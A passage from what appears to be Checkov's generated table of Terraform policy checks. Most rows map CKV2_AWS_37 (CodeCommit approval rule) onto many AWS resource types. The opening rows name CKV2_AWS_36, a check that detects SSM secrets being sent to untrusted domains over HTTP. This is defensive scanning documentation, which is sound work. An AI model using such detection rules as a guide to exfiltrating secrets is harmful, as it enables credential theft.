untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 878 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 879 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 880 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 881 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 882 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 883 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 884 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 885 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 886 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 887 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 888 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 889 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 890 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 891 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 892 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 893 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 894 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 895 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 896 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 897 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 898 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 899 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 900 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 901 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 902 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 903 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 904 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 905 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 906 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 907 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 908 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 909 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 910 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 911 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 912 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 913 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 914 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 915 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 916 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 917 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 918 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 919 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 920 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 921 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 922 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 923 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 924 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 925 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 926 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 927 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 928 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 929 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 930 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 931 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 932 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 933 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 934 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 935 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 936 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 937 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 938 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 939 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 940 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 941 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 942 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 943 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 944 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 945 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 946 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 947 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 948 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 949 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 950 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 951 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 952 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 953 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 954 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 955 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 956 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 957 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 958 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 959 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 960 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 961 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 962 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 963 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 964 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 965 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 966 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 967 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 968 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 969 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 970 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 971 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 972 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 973 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 974 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 975 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 976 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 977 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 978 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 979 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 980 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 981 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 982 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | 